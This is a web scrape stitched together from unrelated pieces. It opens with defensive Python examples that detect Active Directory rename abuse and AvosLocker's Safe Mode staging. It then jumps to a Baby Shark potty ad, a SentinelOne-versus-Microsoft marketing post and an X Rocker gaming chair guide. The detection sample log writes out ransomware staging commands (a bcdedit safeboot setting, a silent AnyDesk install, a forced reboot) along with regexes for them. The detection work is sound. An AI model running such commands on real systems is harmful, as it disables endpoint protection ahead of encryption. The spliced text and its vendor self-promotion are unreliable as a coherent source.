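As an added example (not from the SentinelOne post or from Microsoft’s advisory), here is a small Python check a defender could run over already-parsed Windows Security log events to spot the rename pattern these two bugs rely on: a computer account whose sAMAccountName is changed so that it drops its trailing `$` or collides with a domain controller’s name. The event ID 4742 (“A computer account was changed”) is a real Windows event, but the dictionary key names, the host names, the subject names and the list of known domain controllers below are constructed for this example, not the exact Windows event field names.

```python
"""Spot sAMAccountName changes that make a computer account look like a domain
controller, the rename step behind CVE-2021-42278 / CVE-2021-42287.

Added example; assumptions (not from the page): input records are dicts
already parsed out of Windows Security log events with ID 4742 ("A computer
account was changed"). The key names, host names and the DC list below are
constructed for this example, not the exact Windows event field names."""

# constructed: the domain controllers an admin knows about
KNOWN_DC_NAMES = {"DC01", "DC02"}

# constructed sample of parsed events (one dict per event)
SAMPLE_EVENTS = [
    {"event_id": 4742, "subject": "svc-sccm", "account_name": "WS-0042$",
     "new_sam_account_name": "WS-0042$"},   # attribute touched, name unchanged
    {"event_id": 4742, "subject": "jdoe", "account_name": "LAPTOP-7$",
     "new_sam_account_name": "DC01"},       # loses '$' and collides with DC01
    {"event_id": 4742, "subject": "jdoe", "account_name": "LAPTOP-8$",
     "new_sam_account_name": "DC02$"},      # keeps '$' but collides with DC02
    {"event_id": 4742, "subject": "admin", "account_name": "OLD-PC$",
     "new_sam_account_name": "NEW-PC$"},    # ordinary rename
    {"event_id": 4720, "subject": "admin", "account_name": "helpdesk",
     "new_sam_account_name": None},         # different event type, ignored
]


def is_computer_account(sam_name):
    """Machine accounts carry a trailing '$' by convention."""
    return sam_name.endswith("$")


def bare_name(sam_name):
    """Case-fold and drop the trailing '$' so DC01 and dc01$ compare equal."""
    return sam_name.upper().rstrip("$")


def classify_rename(event, dc_names):
    """Return a reason string if the event is a suspicious rename, else None."""
    if event.get("event_id") != 4742:
        return None
    old = event.get("account_name") or ""
    new = event.get("new_sam_account_name") or ""
    if not old or not new or old.upper() == new.upper():
        return None  # nothing actually renamed
    reasons = []
    if is_computer_account(old) and not is_computer_account(new):
        reasons.append("computer account lost its trailing '$'")
    if bare_name(new) in {bare_name(d) for d in dc_names}:
        reasons.append("new name collides with a domain controller")
    return "; ".join(reasons) or None


def find_suspicious_renames(events, dc_names=KNOWN_DC_NAMES):
    """Return (who, old_name, new_name, reason) for each suspicious 4742 event."""
    findings = []
    for ev in events:
        reason = classify_rename(ev, dc_names)
        if reason:
            findings.append((ev["subject"], ev["account_name"],
                             ev["new_sam_account_name"], reason))
    return findings


def computers_missing_dollar(directory_objects):
    """Inventory check: computer objects whose sAMAccountName lacks the '$'.
    directory_objects is an iterable of (objectClass, sAMAccountName) pairs."""
    return [name for cls, name in directory_objects
            if cls.lower() == "computer" and not is_computer_account(name)]


if __name__ == "__main__":
    for finding in find_suspicious_renames(SAMPLE_EVENTS):
        print(finding)
    print(computers_missing_dollar([("computer", "WS-0042$"),
                                    ("computer", "DC01"), ("user", "jdoe")]))
```

The rename check is the alerting side; `computers_missing_dollar` is the one-off inventory sweep you would run after patching, feeding it an export of your computer objects. Both are heuristics: a legitimate admin can rename a machine account too, so treat a hit as something to investigate together with who made the change and whether the host was actually rejoined.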

The Ugly

As if things aren’t bad enough on the ransomware scene, it gets even uglier when actors find new ways to bypass or disable certain security tools. In that context, we shine a light on AvosLocker, which emerged in June 2021 as a new RaaS (Ransomware as a Service) operator.

In an effort to improve the success rate of encryption, AvosLocker decided to do what any good IT admin would do when encountering a problem on a device: boot it in Safe Mode!

According to researchers, in some cases AvosLocker was forcing victim machines to reboot in Safe Mode with networking, and installing the remote management tool AnyDesk. This allows the attackers to control the target machines remotely while security tools that don’t run in Safe Mode are inactive.

The attackers were also seen running a tool called PDQ Deploy to push customized batch scripts out to target devices to assist in disabling a number of endpoint security solutions before rebooting into Safe Mode. Once booted, the victim machines run the ransomware payload and files are encrypted.

Endpoint security tools affected by the technique, the researchers say, include:

  • Windows Defender
  • Carbon Black
  • Bitdefender
  • Trend Micro
  • Kaspersky
  • Symantec
  • Cylance

AvosLocker does not succeed on devices protected by SentinelOne.
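
An added Python example, not part of the original post, showing how the Safe Mode staging described above could be surfaced from process-creation telemetry: per host, a boot-configuration change that sets the next boot to Safe Mode with networking, followed within a short window by a reboot, with a flag recording whether a remote-management binary (AnyDesk, as named above) was installed in between. The log layout, host and user names, timestamps, regexes and the 15-minute window are all constructed assumptions for this example.

```python
"""Surface the Safe Mode staging pattern described above from process-creation
telemetry: a BCD change that makes the next boot Safe Mode with networking,
followed on the same host within a short window by a reboot, plus whether a
remote-management binary (AnyDesk) was installed in between.

Added example, not from the post. The log layout, host/user names, timestamps,
regexes and the 15-minute window are all constructed assumptions."""
import re
from datetime import datetime, timedelta

# constructed process-creation log: timestamp host user image command_line
SAMPLE_LOG = r"""
2021-12-20T02:11:03 FS01 CORP\svc-pdq C:\Windows\System32\cmd.exe cmd.exe /c stage.bat
2021-12-20T02:11:09 FS01 CORP\svc-pdq C:\Windows\System32\bcdedit.exe bcdedit.exe /set {default} safeboot network
2021-12-20T02:11:20 FS01 CORP\svc-pdq C:\Temp\AnyDesk.exe AnyDesk.exe --install C:\ProgramData\AnyDesk --silent
2021-12-20T02:12:02 FS01 CORP\svc-pdq C:\Windows\System32\shutdown.exe shutdown.exe /r /t 0
2021-12-20T09:30:15 WS07 CORP\itadmin C:\Windows\System32\bcdedit.exe bcdedit.exe /enum
2021-12-20T09:31:00 WS07 CORP\itadmin C:\Windows\System32\shutdown.exe shutdown.exe /r /t 60
"""

# detection patterns (assumed; tune them to your own telemetry)
SAFEBOOT_RE = re.compile(r"\bbcdedit(?:\.exe)?\b.*\bsafeboot\b", re.IGNORECASE)
REBOOT_RE = re.compile(r"\bshutdown(?:\.exe)?\b.*(?:/r|-r)\b", re.IGNORECASE)
RMM_RE = re.compile(r"anydesk", re.IGNORECASE)


def parse_log(text):
    """Turn the constructed log lines into dicts sorted by time."""
    events = []
    for line in text.strip().splitlines():
        ts, host, user, image, cmdline = line.split(" ", 4)
        events.append({"time": datetime.fromisoformat(ts), "host": host,
                       "user": user, "image": image, "cmdline": cmdline})
    return sorted(events, key=lambda e: e["time"])


def detect_safe_mode_staging(events, window=timedelta(minutes=15)):
    """Per host: a safeboot BCD change followed by a reboot within `window`.

    Returns one finding per matching sequence, noting whether an RMM binary
    showed up between the BCD change and the reboot."""
    findings = []
    by_host = {}
    for ev in events:
        by_host.setdefault(ev["host"], []).append(ev)
    for host, evs in by_host.items():
        for i, ev in enumerate(evs):
            if not SAFEBOOT_RE.search(ev["cmdline"]):
                continue
            later = [e for e in evs[i + 1:] if e["time"] - ev["time"] <= window]
            reboot = next((e for e in later if REBOOT_RE.search(e["cmdline"])), None)
            rmm = any(RMM_RE.search(e["image"]) or RMM_RE.search(e["cmdline"])
                      for e in later)
            if reboot is not None:
                findings.append({"host": host, "user": ev["user"],
                                 "safeboot_at": ev["time"],
                                 "rmm_installed": rmm,
                                 "reboot_at": reboot["time"]})
    return findings


if __name__ == "__main__":
    for finding in detect_safe_mode_staging(parse_log(SAMPLE_LOG)):
        print(finding)
```

The point of correlating the three steps rather than alerting on any one of them is precision: admins do run `bcdedit` and `shutdown`, but a Safe Mode boot setting, an RMM install and an immediate restart on the same host within minutes is exactly the staging sequence worth paging someone for. A complementary control is to confirm that your endpoint protection actually starts in Safe Mode with networking, since the whole technique depends on it not doing so.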

This serves as a good reminder that all these ransomware actors are constantly at work, even when not being highlighted in the news. For additional information on ransomware and potential solutions, start here.

Baby Shark Potty – The Secret To Successful Potty Training

There are many ways to toilet train your child. Some might say that modern technology has made this task easier for parents today than ever before, while others may argue it has only complicated the process even further. There is no denying, though, that potty training is a serious challenge for children and parents alike, regardless of how far technology has come to change it.

However, one of the best methods for potty training is also a really old-fashioned technique: The Potty Dance. It’s usually considered comical and silly, but you can actually use this dance to your advantage when toilet training a child. What happens if you connect The Potty Dance with Baby Shark?

Baby Shark Potty

If you’re looking for a potty training method that is fun and will keep your child engaged, then the Baby Shark Potty may be just what you need! This unique potty training tool is based on the popular children’s song, “Baby Shark.”

The Baby Shark Potty is an award-winning potty training seat that uses the familiar “Baby Shark” song to encourage your child to use the potty. Children exposed to this unique method become excited about using their baby shark potty seat. They enjoy hearing music play while using the bathroom, and parents find success in their potty training efforts.

Baby Shark Potty – Features

  • comfortable
  • fun design
  • realistic flushing and cheering sounds
  • easy to use
  • easy to clean lift-out pot
  • reward card and stickers included

The secret to the Baby Shark Potty’s success is its fun and engaging design. The image of Baby Shark supports the connection between your child and the goal of using their potty. The music is a bonus that makes the experience more fun and ensures they stay on task while using their baby shark potty.

The Baby Shark Potty is also made from durable materials that can withstand vigorous use. It is easy to clean and can be used with any standard toilet. Plus, it’s comfortable for your child to sit on, making it an excellent choice for potty training toddlers.

Together with a Baby Shark Potty, you will receive a reward chart and stickers to celebrate each victory of your child using their potty. This way, you can maintain their enthusiasm and encourage them to keep up the good work. Those who use a reward chart find a lot of success in their potty training efforts.

Baby Shark Potty is available now on Amazon. Get your child excited about using the potty with this fun and engaging potty training seat!

Baby Shark Potty – a perfect gift?

The Baby Shark Potty is a great gift to welcome your child into the world. It is a great shower or birthday gift that will bring excitement and joy into your child’s life. It can be used from toddlers to young children, which means it is an investment in their future potty training success.

The Baby Shark Potty has been reviewed on popular sites like Huffington Post, The Giggle Guide, and The Daily Dot. You can be sure that this potty training tool is one of the best methods available to help your child succeed in their potty training goals.

Baby Shark Potty Training

As funny as it might sound, the dance can bring about a breakthrough in toilet training your child. In most cases, parents find that they have to repeat the Potty Dance for months on end before their child finally gets it. Every time you perform this dance, you let your child know that he needs to go to the bathroom and that he is expected to follow suit.

The Baby Shark Potty Dance is a great place to start if you are looking for a potty training method that is both fun and effective. It is based on the Baby Shark song by Pinkfong, which has become a global phenomenon with more than 2 billion views on YouTube.

The Baby Shark Potty Dance is simple, but it gets the job done. The dance consists of three simple steps that are repeated over and over again:

  1. Sing the Baby Shark song
  2. Do the Baby Shark Dance
  3. Reward your child with a sticker, a toy, or a special treat

You need to keep this dance routine going for at least a few weeks before you see any visible results, though, so this method is not exactly a quick fix. The key is to be consistent with this routine and keep things fun for your child. If you do, then toilet training should be a breeze for everyone.

The post Baby Shark Potty – The Secret To Successful Potty Training appeared first on Comfy Bummy.

Why Your Operating System Isn’t Your Cybersecurity Friend

The primary objective in information security is to reduce the risk exposed through cyber threats towards an organization. To achieve that, security leaders aim to make informed decisions that allow their organization to best protect, detect, respond, and recover from cyber threats. Therefore, when looking into reducing risk, security leaders often choose to reduce significant dependencies in their enterprise architecture and procedures towards a particular vendor or capability.

That strategy makes good sense, but what about when you are considering security software? Some believe that OS vendor-supplied security software must be “safer” or less risky than that of 3rd party vendors. After all, this line of thinking goes, who knows the OS better than those who developed it?

Yet choosing security software sold by your operating system vendor increases your dependency on a single vendor, and in some of the most security-critical areas, too. In this post, we’ll review the pros and cons of relying on your OS vendor for security software, and we’ll take a look at what 3rd party vendors offer that an OS vendor cannot.

Security and Operating Systems | Expertise Matters

It goes without saying that the developer of any software knows that software best – they are after all, the owners of the source code – but we are where we are in cybersecurity in no small part because developers frequently fail to understand the security implications of their own products.

Responsible software companies implement bug bounty programs to invite external security specialists to audit their software, and this is no less true of OS vendors like Microsoft, Google, Apple and Red Hat Linux as it is of developers of browsers, and indeed, security software vendors, too. The more complex a piece of software, the more likely there are to be vulnerabilities, a fact borne out by recent CVE statistics in Microsoft Windows, for example.

  • In 2020, Microsoft confirmed 1,220 new vulnerabilities impacting their products, a 60% increase on the previous year.
  • 807 of 1,220 vulnerabilities were associated with Windows 10, with 107 of those related to code execution, 105 to overflows, 99 to gaining information, and 74 to gaining privileges.
  • In 2021, 836 new vulnerabilities have been confirmed so far, 455 of which impact Windows 10 and 107 allow malicious code execution.

While this data refers to the most recent vulnerabilities, it’s also important to understand that many old vulnerabilities are still actively exploited by threat actors.

Operating system software is, and always will be, riddled with security vulnerabilities. Across Microsoft products, it is the Windows operating system where most security bugs are being found. Additionally, Microsoft has the highest rate of zero days compared to any other operating system vendor. Even more alarming is that most of these vulnerabilities relate to elevation of privilege or remote code execution: high risk vulnerabilities that threat actors can and do use to compromise organizations.

When a vendor is dealing with such an overwhelming amount of CVEs affecting so many different product lines, increasing your dependency on more products from that vendor requires a moment’s thought.

How much time and effort can the OS vendor extend to ensuring vulnerabilities in their security software offering are found and dealt with in a timely manner? A 3rd party vendor with a much smaller portfolio and expertise in security itself may be much better placed to provide a reliable and effective security solution than an OS vendor with other priorities.

Moreover, with such a huge code base containing potentially vulnerable code, code dependencies in OS vendor products can present attackers with unexpected opportunities. For example, in 2021 SentinelLabs discovered a simple privilege escalation bug in Windows Defender that had been in the code since 2009.

CVE-2021-24092: 12 Years in Hiding
A Privilege Escalation Vulnerability in Windows Defender

As we have seen, just because an OS vendor knows their own product better than anyone else, it doesn’t follow that they are best placed to understand or even deal with the security implications of that software. And the bigger and more complex the software, the more true that is going to be.

When you add all this together, it raises a troubling thought: is the vendor that is likely the source of the most vulnerabilities in your environment really the vendor you want to select for cybersecurity?

Nonetheless, perhaps there is another good argument for preferring security software from an OS vendor rather than a dedicated security solutions specialist: If one were looking for a turnkey solution, perhaps the OS vendor’s own security offering should be less hassle than installing a security solution from a third party vendor?

There are a number of issues to consider here; installation, licensing, cost, ease-of-use, integration, and, ultimately, the effectiveness of the protection.

E5 Licensing Complexities | What’s Not Included In The Box

Among the major OS vendors, Microsoft is unique in having chosen to develop and sell a product to protect its own operating system software. Arguably, there is a conflict of interest in a software company looking to build revenue by marketing a security product to protect its other products, and potential customers might wonder whether the engineering effort expended there would have been better spent on directly securing those products.

Even if organizations choose to pay the premium and procure Microsoft 365 E5 Security, Enterprise Mobility and Security E5, or Windows E5 licenses, they often discover after the fact that they end up requiring additional 3rd-party products to cover the gaps of Microsoft’s security portfolio:

  • When it comes to Extended Detection and Response (XDR) solutions, the general consensus in the industry is that a solution must be able to perform 3rd-party data ingestion to perform cross-workload data analytics and response actions. Microsoft 365 Defender lacks the ability for 3rd-party data ingestion, so organizations are left with a technology that can only process its own dataset and therefore only protect the limited scope of Microsoft solutions.
  • Microsoft’s Endpoint Protection Platform (EPP) and Endpoint Detection and Response (EDR) offering is called Microsoft Defender for Endpoint. The solution continues to lack in several critical areas including detection quality, automatic remediation of cyber threats on non-Windows 10 endpoints, and 1-click recovery from cyber threats.

Many customers evaluating Microsoft alongside SentinelOne consistently say that the “With E5 you have everything you need” claim of Microsoft turned out to be inaccurate. Once they began their evaluations, the gaps became significant, and were compounded over time by the fact that Microsoft tends to introduce additional niche products.

For example, Microsoft recently made the decision not to support Kubernetes clusters and containers with Microsoft Defender for Endpoint; instead, they announced Microsoft Defender for Containers, yet another product which is not included in E5 and which again requires additional licenses, procurement, and deployment.

Beyond that, the procurement process can quickly become very complex as all the different products are spread across dozens of different licensing models in Microsoft Azure, Microsoft Windows, and Microsoft 365.

Some of these licensing models are per endpoint, others per user, and still others are pay-as-you-go. This plethora of offerings can make it extremely difficult to predict the actual cost of the platform for a business with multiple, complex needs.

In contrast, a solution like the Singularity platform has a very simple, straightforward licensing model where customers can choose between:

  • Singularity Core – On-device, NGAV with autonomous behavioral AI that does not rely on the cloud to detect, prevent and remediate file-based and fileless attacks, including ransomware.
  • Singularity Control – Singularity Core with additional endpoint control capabilities like firewall, device control, and more.
  • Singularity Complete – Singularity Control with additional Endpoint Detection and Response (EDR), Cloud Workload Security, and Network Security capabilities.

All three options are licensed in a subscription model per agent/month, with no hidden costs.

Ease of Use and Integration

It’s a natural and expected consequence of using software from one vendor that, where they have other offerings, they will try to encourage take up of their other products. But one of the most important things for an enterprise when choosing security software is how it can reduce risk, decrease dependencies, and easily integrate with the rest of the security stack.

With Singularity XDR, organizations are able to gain unified visibility across their technology ecosystem, and benefit from unparalleled data analytics with centralized cross-workload response actions.

With this approach, SentinelOne customers have the flexibility they need in order to choose a best-of-breed strategy while being able to centralize into a unified security platform.

In contrast, Microsoft’s methodology pushes organizations into a closed ecosystem, which means increasing the dependency to a single vendor that can quickly become a single point of failure.

The Ultimate Test: Who Protects Best?

Every vendor will tell you they are better than the competition, and it’s vital for security leaders to look at independent 3rd-party evaluations when comparing security products.

The most recent MITRE Engenuity ATT&CK Evaluation is a good place to start.

Despite the fact that the simulation took place predominantly on Windows, Microsoft’s own security product still had 23 missed detections. During the test, they paused the evaluation 35 times to perform configuration changes, including to their detection logic: a luxury an organization does not have in the real world during a cyber-attack.

In comparison, SentinelOne had zero misses, zero configuration changes, and 100% visibility.

Taking Advantage of a Best-of-Breed Approach

Security leaders aware of the pitfalls we’ve mentioned above are choosing a best-of-breed approach and bringing in security-first vendors to partner with for their security requirements.

With Singularity, SentinelOne provides a best-in-class Extended Detection and Response (XDR) platform that extends protection from the endpoint to beyond with visibility, proven protection, and unparalleled response:

  • One security console: Built for centralized & intuitive operations. Whether SOC analysts are chasing bad actors or security administrators need to configure device control policies, all can be achieved in one console.
  • Best-in-class EPP + EDR for modern threats: Every endpoint is equipped to prevent and detect with robust static & behavioral AI, even when offline.
  • Consistency: SentinelOne provides you consistency in terms of what features are available and ensures feature parity across Windows, macOS, and Linux.
  • Time-saving automation: Automatic attack reconstruction with Storyline™ technology, autonomous & 1-click remediation and patented rollback, dedicated in-house experts for MDR, DFIR, and threat hunting.

SentinelOne Singularity XDR
See how SentinelOne XDR provides end-to-end enterprise visibility, powerful analytics, and automated response across your complete technology stack.

Conclusion

Cybersecurity is all about managing risk as effectively as possible. There is no organization in the world that is immune to cyber threats. Over the years, security leaders have been required to make a choice between best-of-suite or best-of-breed approaches for their technology stack.

With the increasing complexity of cyber threats, the continuous increase of cyberattacks, and the increased dependency on operating system vendors, organizations are looking to partner with security-first companies that can provide a holistic approach to security.

If you would like to learn more about how SentinelOne can reduce cyber risk across your entire organization – Windows, Linux, macOS, IoT, mobile and cloud workloads – contact us or request a free demo.

X Rocker Gaming Chairs For Kids – Are They Worth A Buy?

If you’re on the hunt for a gaming chair for your little one, there are a few things you should consider before making your purchase. X Rocker Gaming Chairs have become quite popular in recent years, but are they worth the investment?

Many kids dream of having the coolest gaming chair – and X Rocker Gaming Chairs are undoubtedly high on that list. But are they worth the money?

Why do kids need a gaming chair?

As you know, kids can spend hours playing video games. Unfortunately, they spend most of that time seated, leading to all kinds of posture problems.

A gaming chair is a perfect way to prevent these problems, as it keeps the spine in a neutral position. This is essential for growing bodies, as it helps them develop properly.

There are several models of gaming chairs for kids, but they all have one thing in common: they support your back and neck, so you can enjoy playing games without feeling any discomfort.

But it’s not just about offering comfort. A gaming chair is also one of the best ways to improve your performance when playing video games. You can lean back in this chair or lift your feet and place them on the rests without any problem – all while you’re focused on winning!

Why are X Rocker Gaming Chairs so popular?

X Rocker Gaming is a company that specializes in gaming accessories, such as wireless headphones and chairs for playing video games. They offer products that anyone can use – from professional gamers to casual players – and even children.

One of the reasons why their gaming chairs are so popular is that they come with many features. For example, the X Rocker Gaming Chair for Kids has built-in speakers that will immerse your child in the game. It also has a comfortable headrest and backrest to ensure your child stays seated for hours on end.

Another popular feature is the fact that most of these chairs are wireless. This means that you don’t have to worry about getting tangled in cables while you’re trying to concentrate on the game.

It is, therefore, no wonder that many parents are looking for X Rocker Gaming Chairs For Kids to help them play video games in the best possible conditions.

The X Rocker Gaming chairs are designed to be comfortable and improve your gaming experience. And, because they’re so popular, you can find a variety of models and designs to choose from.

What should you look for when buying an X Rocker Gaming Chair?

When looking for an X Rocker Gaming Chair, you should keep a few things in mind. As we mentioned before, these chairs are designed for comfort and to improve your playtime – so you should look for one that has all of the features you need.

Some of the features you should consider before buying include:

  • Number and positioning of speakers. The more speakers your chair has, the better it will sound – which is essential for immersing yourself in the game.
  • Comfort. You should check to make sure that the seat is comfortable enough to sit on for hours at a time and that it has excellent lumbar support.
  • Wireless technology. This is a must-have feature, as it will keep you from getting tangled in cables.
  • Style and design. You should choose a chair that matches your personality and gaming style.

On top of the features mentioned above, there are a few more things to think of since the gaming chair is for kids.

  • The chair should be lightweight, so your child can move it with ease after playing and prevent injuries when they pick it up.
  • The armrests should be adjustable because their size will change as time passes (and as your child grows).
  • You should make sure that the chair is easy to clean in case of any spills.
  • The chair should also have a warranty if something goes wrong with it.
  • The most important thing you should consider when buying an X Rocker Gaming Chair for your child is that the chair will fit them. It doesn’t matter how good the chair is – if it’s too small or too big, your child won’t be able to use it for as long as they should.

When looking for an X Rocker Gaming Chair, keep all of these factors in mind to ensure you’re getting the best possible product for your needs. And don’t forget to take into account your child’s specifics – their favorite color, for example.

The best X Rocker Gaming Chairs – the guide

In this guide, we’ll be talking about the different options you have when it comes to X Rocker Gaming Chairs For Kids. You will be able to compare the different models and prices, to make a wise choice when purchasing one of these chairs.

Floor Rocker Gaming Chairs

Floor gaming chairs are a great choice because they will keep your kids off the ground and offer a comfortable gaming experience.

These chairs are designed to be used while sitting on the floor – which offers a low-profile design and lots of stability.

Some of the best X Rocker Floor Gaming Chairs include:

X Rocker Surge Floor Gaming Chair

The X Rocker Surge is an excellent chair for both kids and adults. With its powerful subwoofer and two front-facing speakers, you’ll get exceptional sound and a slight rumble, emphasizing your game, movie, or music. You can play audio from any Bluetooth-enabled device wirelessly through the chair.

X Rocker Surge includes a cushioned backrest and arms for maximum comfort when gaming. The chair is covered in durable black vinyl and has a weight capacity of 275 pounds.

The audio control is located on the side of the chair and includes easy-access volume, bass, and vibration controls. X Rocker Surge comes with a wireless receiver that you can plug into any RCA output jack on your TV or stereo system, making it great for gaming on your home theater system. The chair also folds up for easy storage and transport.

Dimensions: 36.81″D x 32.28″W x 20.89″H

X Rocker II SE Floor Gaming Chair

The X Rocker II SE is a comfortable and stylish gaming chair that’s great for playing video games, watching movies, or listening to your favorite tunes.

You can play your favorite games without being tangled up in cables with wireless audio. This chair has wireless audio transmission, two speakers near the headrest, and a subwoofer positioned to pound your back with bass-heavy sounds that will enhance your game, movie, or music.

Plug your headphones into the headphone jack and adjust the bass and volume control on the side jack to your liking. The Rocker II SE connects to Xbox, PlayStation, Gameboy, MP3/CD/DVD, and home theater systems.

The chair’s upholstery is black leather-like vinyl and is easy to clean. The X Rocker II SE has a weight capacity of 275 pounds and folds for easy storage.

Dimensions: 27.8″D x 18.5″W x 17.5″H

X Rocker Eclipse Floor Gaming Chair

The X Rocker Eclipse is an excellent choice for kids who want a comfortable gaming experience. The chair has two front-facing speakers to give you an immersive audio experience while gaming.
The sleek rocker design shifts and reclines to give you more comfortable playing positions during your most extended gaming sessions. The chair is covered in durable black vinyl and has a weight capacity of 275 pounds.
The simple design of this gaming chair will fit in any room. The stylish black and silver design complements your home, game room, bedroom, or dorm room with a modern feel.

Dimensions: 31″D x 27.5″W x 16.5″H

X Rocker Flash 2.0 Floor Gaming Chair

This gaming chair has an integrated 2.0 Wired Audio System with headrest-mounted speakers for enhanced immersion in video games. It connects easily to most gaming systems – all you have to do is plug it into your device.

The X Rocker Flash 2.0 High Tech Audio Wired Gaming Chair’s rocking design provides smooth movement and reclines for ideal gaming positions throughout your longest missions in the game. This flexible chair is suitable for living rooms, game rooms, bedrooms, dorm rooms, or your favorite gaming area. It is also great for watching movies, reading, and lounging.

Have we mentioned how easy it is to maintain? The Flash 2.0 chair is easy to clean with a simple wipe down. Fold it down for easy storage and transport.

Dimensions: 30.71″D x 16.54″W x 26.77″H

X Rocker Lux 2.0 Floor Gaming Chair

The X Rocker Lux 2.0 Bluetooth is a lightweight yet comfortable floor gaming chair for children and players of all ages.
This chair comes with a discreet headrest-mounted 2.0 Bluetooth sound system that improves your audio experience when playing games, watching films, or listening to music.

This exquisite limited edition folding floor rocker is embellished with an eSports-inspired design and features a rich black and gold faux leather covering for added comfort, as well as a sleek black frame that folds down to store.

Fully-padded arms, a high backrest, and a durable black nylon rocker base are just some of the other features contributing to this chair’s comfortable design.

Dimensions: 31.1″ D x 18.11″ W x 29.72″ H
Weight Limit: 240 lbs

X Rocker Spade Floor Gaming Chair

The X Rocker Spade 2.1 is a portable and foldable rocker chair that can handle all of your gaming requirements; the integrated audio and subwoofer system produces an incredible sound experience while playing games, listening to music, or watching movies. Deep foam padding, which is ergonomically designed and offers long-term comfort while gaming, allows extended gameplay.

The X Rocker Spade 2.1 floor chair has a durable nylon base that allows you to game with precision and accuracy. You can find an ideal position that provides the ultimate playing experience, whether you’re rocking back and forth or staying still; the Spade 2.1’s headrest design will give you access to many different positions.

The foldable and portable design allows for easy transport and storage. This chair can be stored away in a closet, under the bed, or even behind the couch, so you always have a place to sit when it comes to gaming time.

Dimensions: 29.53″D x 16.9″W x 28.15″H

X Rocker Limewire Floor Gaming Chair

The X Rocker Limewire 2.1 BT Floor Rocker is designed for both casual and professional gamers, allowing them to not only hear the game’s noises but also feel them. The game chair is made with high-tech materials, and it has a built-in 2.1 Bluetooth Audio System with headrest-mounted speakers and a subwoofer located at the back to give you the sensation that you’re in the game.

The chair is compatible with various gaming systems and wireless devices, allowing you to enjoy video games, movies, music, and more.

The adjustable armrests on the rocking design with cushioned resting supports allow you to play in several positions throughout your most prolonged gaming sessions. The modern black and green pattern fits in well with most décor styles.

Measurements: 36.2″D x 31.5″W x 20.8″H

X Rocker Pro Series H3 Floor Gaming Chair

The ultimate all-purpose gaming chair! A leather lounging game chair may be used to play video games, watch movies and TV, listen to music, read, and unwind.

Four forward-pointing speakers, audio force modulation technology, and ported power subwoofers are combined in the chair’s open area for complete immersion in your gaming, movie, or music experience.

The Pro Series H3 has extra vibration motors that sync with your music’s bass tones to deliver an even more powerful whole-body feeling that will keep you comfortable and amused for hours.

This gaming chair is compatible with all gaming consoles. It comes with a built-in amplifier for high-quality sound, speakers flanking both sides of the chair, and controls for volume, bass, and vibration.

The X Rocker Pro Series H3 is made of a durable wood and metal frame covered with padded vinyl. The weight capacity is 275 pounds.

Dimensions: 35″D x 22″W x 34.5″H

X Rocker Emerald RGB Floor Gaming Chair

This sophisticated chair has an integrated 2.0 Wired Audio System with headrest-mounted speakers and a backrest subwoofer to immerse you in the game.

The chair’s high-quality hooded design, complete with a softly curved armrest and backrest, makes it stylish and comfortable. It also has RGB LED technology built-in for lighting effects that can be modified using the touch of a button.

Although this gaming chair is not wireless, it does have a built-in headphone jack and volume control for personal listening. With a weight capacity of 250 pounds, the X Rocker Emerald RGB is great for both children and adults.

Measurements: 30.3″D x 26.4″W x 22.2″H

X Rocker Extreme III Floor Gaming Chair

The X Rocker Extreme is great for gaming, watching movies and TV shows, and listening to music. A built-in 2.1 Speaker System with a subwoofer and amplifier puts out 30 watts of sound for impactful bass and overall audio quality.

The unique, full-bodied sound system chair provides you with total media immersion and has been carefully built to boost the sound quality and enhance your experience.

The X Rocker’s speakers and its ported power subwoofers are boosted by the open area inside the X Rocker rather than simply the frame, resulting in improved sound quality.

The chair has a sturdy wood frame and is covered with durable faux leather for optimal comfort. It provides excellent support, making it great for people of all ages and sizes. The weight capacity is 275 pounds.

Dimensions: 26″D x 17.5″W x 17″H

X Rocker Pedestal Chairs

Not everyone wants to sit that close to the floor, and that’s ok! If you are looking for a gaming chair in a more traditional form, the X Rocker Pedestal Chairs might be exactly what you’re looking for!

X Rocker Vibe Gaming Chair

With a beautiful, breathable fabric back and seat, this high-back tilt & swivel pedestal gaming chair may be used to play video games, watch movies, listen to music, read, and unwind. You will not want to get up!
Integrated with two 2.0 speakers and a powerful subwoofer, the X Rocker Vibe creates an experience that will keep you captivated and relaxed for hours on end.
Vibe 2.1 Bluetooth Pedestal Gaming Chair has extra vibration motors that sync with your audio’s bass tones to provide an even more powerful full-body sensation, keeping you comfortable and engaged at the same time.
The chair’s ergonomic design includes a headrest and lumbar support for additional comfort. The X Rocker Vibe can be used with all gaming consoles and has a weight capacity of 250 pounds.

Dimensions: 33.86″D x 40.55″W x 23.62″H

X Rocker Covert Gaming Chair

This chair is designed for the modern gamer. It has a sleek, low-profile design and is made of vinyl and metal. The Covert is lightweight and easy to move around, making it perfect for use at home or LAN parties.

The built-in 2.1 audio system provides high-quality sound and powerful bass, while the included wireless transmitter allows you to connect wirelessly to your game console or PC. Two subwoofers make sure that you will feel that bass!

The unique design adjusts to your body rather than forcing you to change, providing superior comfort. Lumbar and neck support for extra comfort make it ideal for long-haul missions in the game.

Dimensions: 30.71″D x 25.19″W x 37.6″H

X Rocker Falcon Gaming Chair

The low-slung X Rocker Falcon Pedestal is as ergonomic as gaming chairs get, although it sits somewhat lower than most others on the market – therefore, it is more suitable for children.

On the other hand, the distinctive design provides maximum stability thanks to the enormous pedestal base. The use of a lumbar roll relieves pressure on the spine, allowing for more blood flow and nutrients to reach the lower back. In addition, it minimizes fatigue and soreness by extending blood flow and nutrient availability. The X Rocker Falcon is comfortable and safe for developing gamers.

What about the other technical specifications of the X Rocker Falcon? The 2.1 wireless integrated sound system is one of the appealing aspects of the Falcon Pedestal Gaming Chair. There are seat-mounted speakers and a rear subwoofer to make you feel like you’re actually inside the game. The whole set is mounted on a unique pedestal base with good stability and an enormous surface area.

The X Rocker Falcon Pedestal offers three different sound options: Bluetooth, RCA (stereo), and headphone jacks (3.5mm). The wireless RCA or stereo jack connectivity ensures that you can connect the device to your favorite gaming console, laptop, or media player. The X Rocker Falcon Pedestal Gaming Chair is designed to work with almost every operating system available.

Dimensions: 32″D x 25″W x 42″H

X Rocker Mammoth Gaming Chair

The X Rocker Mammoth has a durable faux leather covering and an ultra-padded seat. Because of that, it is one of the most comfortable gaming chairs on the market.

In addition, it comes with a built-in 2.1 amplifier for high-quality sound, speakers on either side of the chair, and controls for bass, volume, and vibration. With the top-of-the-line 2.1 Dual audio system, you may link to all of your favorite gaming systems, including PlayStation 4, Xbox One, and Nintendo Switch. The sound-reactive vibration motors add to your gaming experience, while an elevated pedestal base keeps you off the floor for extended periods of fun and entertainment.

